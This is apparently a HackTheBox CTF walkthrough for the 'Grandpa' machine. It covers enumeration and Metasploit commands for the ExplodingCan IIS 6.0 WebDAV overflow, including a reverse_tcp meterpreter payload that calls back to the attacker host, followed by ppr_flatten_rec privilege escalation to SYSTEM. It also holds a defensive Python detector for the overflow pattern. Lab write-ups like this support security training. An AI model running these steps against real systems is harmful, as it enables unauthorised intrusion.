HacktheBox - Grandpa Writeup

09/12/2019

Zero to OSCP Hero Writeup #16 - Grandpa

Reconnaissance

1. Nmap Scan - Common Ports TCP Scan

Let's start with a TCP scan of the target IP address to determine which common ports are open and which services are running on them:

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.14

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -oA: Output the result of the scan in all formats as nmap/initial.tcp

From the scan we can see that there is only one port open, port 80. We can also see mentions of WebDAV, which was vulnerable on the box Granny... Let's see if there are any similarities!

2. Nmap Scan - All TCP Ports Scan

Okay, let's scan the entire TCP port range to confirm that there are no other ports open:

nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.14

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full TCP scan confirmed that there are no additional ports open.

3. Nmap Scan - All UDP Ports Scan

We can do the same full port scan, but with the UDP ports:

nmap -sU -p- -oA nmap/full.udp 10.10.10.14

  • -sU: Run the scan against UDP ports
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.udp

The full UDP scan confirmed that there are no additional ports open.

Enumerating Port 80

1. Browse to https://10.10.10.14

Again, exactly like the box Granny, we get an under construction page.

2. Find hidden directories - Gobuster 

Let's run gobuster and see if we can find any hidden directories of interest:

gobuster dir -u 10.10.10.14 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

As expected, there is a _private directory. Let's browse to it and see if we can get any information!

3. Browse to https://10.10.10.14/_private

Okay, so this is different from Granny: we do not get anything of interest from the directory. As we know WebDAV is on the machine, let's enumerate that instead...

Enumerating WebDAV

1. DAVtest 

DAVTest tests WebDAV enabled servers by uploading test executable files, and then uploading files which allow for command execution or other actions directly on the target.

Let's run it!

davtest -url https://10.10.10.14

Okay, so it seems that the WebDAV upload route isn't the one we should be going down: we are unable to upload any files to the server, so we cannot exploit it that way.

Enumerating IIS Version

As WebDAV is not exploitable, I checked the nmap output again and it shows that the machine is running IIS version 6.0. 

IIS version 6.0 was released with Windows Server 2003, so it is quite possibly vulnerable to a public exploit.

1. Checking for public exploits 

After a quick Google search, I came across a remote buffer overflow exploit, which can be found here.

The overflow allows remote attackers to execute arbitrary code via a long header beginning with "If: <https://" in a PROPFIND request. 
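Pulling together the three things enumerated above (what DAVTest probes, the IIS 6.0 banner, and the long "If:" header in a PROPFIND request), here is a small defensive checker written for this writeup as an added example; it is not code from the post, from DAVTest, or from the NSE script or exploit mentioned. It parses raw HTTP messages and reports which write-capable WebDAV methods an OPTIONS response advertises, whether the Server banner is IIS 6.0 or older, and whether a PROPFIND request carries an If: header that starts with "<http" and exceeds a length threshold. The 512-byte threshold, the WRITE_METHODS set, and every sample message are assumptions constructed for the example.

```python
import re

# WebDAV methods that let a client change content on the server. DAVTest probes
# these by actually uploading files; this check only reads what the server
# advertises in an OPTIONS response. The set is an assumption for this example.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}

# Assumed threshold: legitimate If: headers carry a few lock tokens or ETags and
# stay far below this, so a longer one on a PROPFIND is worth an alert.
IF_HEADER_LIMIT = 512


def parse_http_message(raw: str):
    """Split a raw HTTP request or response into (start_line, headers).

    Header names are lower-cased; repeated headers are joined with ', '.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        name, value = name.strip().lower(), value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return lines[0], headers


def exposed_write_methods(options_response: str):
    """Return the write-capable WebDAV methods listed in Allow/Public, sorted."""
    _, headers = parse_http_message(options_response)
    advertised = set()
    for field in ("allow", "public"):
        if field in headers:
            advertised.update(m.strip().upper() for m in headers[field].split(","))
    return sorted(advertised & WRITE_METHODS)


def iis_version(response: str):
    """Return the IIS version from the Server header as a float, or None."""
    _, headers = parse_http_message(response)
    m = re.match(r"Microsoft-IIS/(\d+(?:\.\d+)?)", headers.get("server", ""))
    return float(m.group(1)) if m else None


def runs_unsupported_iis(response: str):
    """IIS 6.0 shipped with Windows Server 2003, which is out of support, so
    6.0 or older is flagged."""
    version = iis_version(response)
    return version is not None and version <= 6.0


def suspicious_propfind(request: str):
    """True when a PROPFIND request carries an If: header that starts with
    '<http' and is longer than IF_HEADER_LIMIT bytes."""
    start_line, headers = parse_http_message(request)
    if start_line.split(" ", 1)[0].upper() != "PROPFIND":
        return False
    if_value = headers.get("if", "")
    return if_value.startswith("<http") and len(if_value) > IF_HEADER_LIMIT


# Constructed OPTIONS response resembling an IIS WebDAV server with authoring on.
SAMPLE_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "DAV: 1, 2\r\n"
    "\r\n"
)

# Constructed ordinary PROPFIND with a short, well-formed If: header.
BENIGN_PROPFIND = (
    "PROPFIND /_private/ HTTP/1.1\r\n"
    "Host: 10.10.10.14\r\n"
    "Depth: 1\r\n"
    "If: <http://10.10.10.14/_private/> (<opaquelocktoken:constructed-0001>)\r\n"
    "\r\n"
)

# Constructed PROPFIND whose If: header is just oversized padding, matching the
# shape described in the writeup without any exploit content.
OVERSIZED_PROPFIND = (
    "PROPFIND / HTTP/1.1\r\n"
    "Host: 10.10.10.14\r\n"
    "If: <http://10.10.10.14/" + "A" * 600 + ">\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print("write methods exposed:", exposed_write_methods(SAMPLE_OPTIONS_RESPONSE))
    print("unsupported IIS:", runs_unsupported_iis(SAMPLE_OPTIONS_RESPONSE))
    for label, req in (("benign", BENIGN_PROPFIND), ("oversized", OVERSIZED_PROPFIND)):
        print(f"{label} PROPFIND suspicious:", suspicious_propfind(req))
```

The same functions can be pointed at a proxy or IIS request log export: feed each captured message to suspicious_propfind() to surface the overflow trigger pattern, and feed the OPTIONS response to exposed_write_methods() to confirm that authoring methods are disabled once WebDAV is no longer needed.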

2. Create iis-buffer-overflow NSE Script

Before trying an exploit on the machine, I want to make sure it is vulnerable. To do this, I found an NSE script that will check for the remote BoF vulnerability on the machine.

2.1 Copy contents of the online script

To create the NSE script, we need to copy the contents of this script.

2.2 Create the NSE script file

We need to create the script file inside the nmap scripts directory: 

/usr/share/nmap/scripts

nano iis-buffer-overflow.nse 

2.3 Run the iis-buffer-overflow NSE script

Now that the script has been created, let's see if the machine is vulnerable to this exploit:

nmap --script iis-buffer-overflow 10.10.10.14

That's a Bingo!

Now that we know the machine is vulnerable, let's find a working exploit!

Initial Foothold and Priv Esc - Root 

1. ExplodingCan IIS 6.0 WebDAV BoF Exploit

ExplodingCan is an NSA-made exploit targeting WebDAV on IIS 6.0. I found this GitHub page that details how the exploit works, with a Python script.

I also found out that there is a Metasploit exploit for this too, which I had to use, as my shells for the Python script always failed with both netcat and multi/handler.

So to exploit the vulnerability, I'm going to use the Metasploit method:

1.1 Find the exploit

Let's use the Metasploit search function to find the correct exploit:

search explodingcan

1.2 Configure the exploit 

Once we have selected the exploit, we need to configure it to work on the vulnerable machine. 

show options

So for the exploit to work, we need to set the RHOSTS IP address, the payload, and the LHOST and LPORT details:

set rhosts 10.10.10.14

set payload windows/meterpreter/reverse_tcp 

set lhost 10.10.14.59

set lport 9002 

run 

Nice, the exploit worked and we now have a reverse TCP connection!

We can now gather some system information:

sysinfo

2. Further Exploitation 

Although we are on the machine, we are still only running as nt authority\network service, meaning we cannot access the user.txt flag, which I assume is in the user Harry's directory.

2.1 Local Exploit Suggester 

I'm going to use the inbuilt Metasploit post-exploitation module, Local Exploit Suggester, to find a route to either Harry or Administrator.

run post/multi/recon/local_exploit_suggester 

3. Exploiting ppr_flatten_rec 

So the machine looks to be possibly vulnerable to a few exploits, but we will concentrate on the bottom one: ppr_flatten_rec

use exploit/windows/local/ppr_flatten_rec 

set session 1

set lhost 10.10.14.59

set lport 9003 

run 

3.1 Timeout Errors 

I was experiencing timeout errors when trying to launch the exploit; this was because the process we were currently running in was not suitable for the exploit.

3.2 Migrating Processes 

For the exploit to work, we need to migrate to a different process that is currently being run as Network Service. Let's take a look at the running processes:

ps 

I am going to migrate to process 2244, davcdata.exe, as it is being run by Network Service.

migrate 2244

3.3 Running the exploit again

Now that we have migrated to a new process, let's run the exploit again:

And the exploit works: we get a new meterpreter session as SYSTEM!

4. Grab the user and root flags 

Now that we are SYSTEM, we can grab both of the flags: 

user.txt:

root.txt: 

Conclusion

This machine was a nightmare to root, not in terms of difficulty but because of exploits that should have worked but didn't; migrating to a different process took 4 box resets and many meterpreter sessions!

Disappointed to have used Metasploit, but it was taking far too long to get the box rooted manually.

Thanks for reading, Next up is Box #17 - Sense!